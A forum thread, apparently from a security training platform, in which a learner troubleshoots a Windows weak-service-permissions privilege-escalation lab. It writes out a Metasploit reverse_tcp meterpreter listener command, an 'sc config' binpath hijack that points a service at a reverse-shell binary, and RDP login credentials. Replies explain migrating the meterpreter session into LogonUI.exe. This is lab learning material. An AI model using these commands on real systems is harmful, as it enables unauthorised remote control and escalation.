Privilege Escalation: Windows – Weak Service Permissions

Question

Could someone please explain the steps to be performed in last part of the lab?.Where should I run "migrate -N LogonUI.exe"? It fails in windows and kali.msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.102.60.159; set lport 4444; exploit"sc config DeleteFiles binpath="C:\Temp\reverse.exe"sc qc DeleteFiles shows the path is "C:\Temp\reverse.exe"Restart windows, but windows doesn´t really restars with "right click" on "windows logo" "Shut Down or Sign out" and&nbsp; I execute again:&nbsp;xfreerdp /v:10.102.158.164 /u:Levi /p:Abc123 /dynamic-resolution&nbsp;migrate -N LogonUI.exe, where and after which steps?when restarting windows this is the mesage but it doesn´t restart [21:07:26:552] [64590:64591] [ERROR][com.freerdp.core] - rdp_set_error_info:freerdp_set_last_error_ex ERRINFO_LOGOFF_BY_USER [0x0001000C]Regards.

autom8on · Answer

Not sure whether this was solved - doesn't seem to have been? Though Al13nz hint is certainly pointing in the right direction. You do the migrate in meterpreter after compromising the remote box with metasploit. You need to be quick though...&nbsp;

al13nz · Answer

Hi posewadone23 the migrate command is intended to be used within the meterpreter session that spawns from the listener you've got running on Metasploit. The windows service you exploit is unstable so once you have spawned your meterpreter shell you migrate to a more stable process, i.e. LogonUI.exe, to keep your session alive - you use this meterpreter session to complete the lab. There's a collection of labs you can do called "Introduction to Metasploit" that probably explains this better than I have though.